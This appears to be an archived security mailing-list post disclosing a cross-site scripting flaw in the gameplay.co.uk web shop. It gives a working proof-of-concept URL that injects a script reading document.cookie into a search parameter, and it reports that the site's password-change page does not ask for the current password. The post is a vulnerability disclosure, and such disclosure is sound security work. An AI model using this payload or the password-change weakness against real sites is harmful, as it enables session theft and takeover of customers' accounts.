GamePlay.co.uk XSS

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Homepage: www.gameplay.co.uk

Example:
http://shop.gameplay.co.uk/webstore/advanced_search.asp?Keyword=&terms=!&badterm=<script>alert(document.cookie)</script>

Also...

The current password is not necessary for a successful password change for members of gameplay.co.uk which makes changing passwords through scripts as easy as tying your shoe lace.
(https://shop.gameplay.co.uk/gameplay/changepassword.asp)

I tried emailing these clowns about their silly flaws, but I had no joy.


Charlie.

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux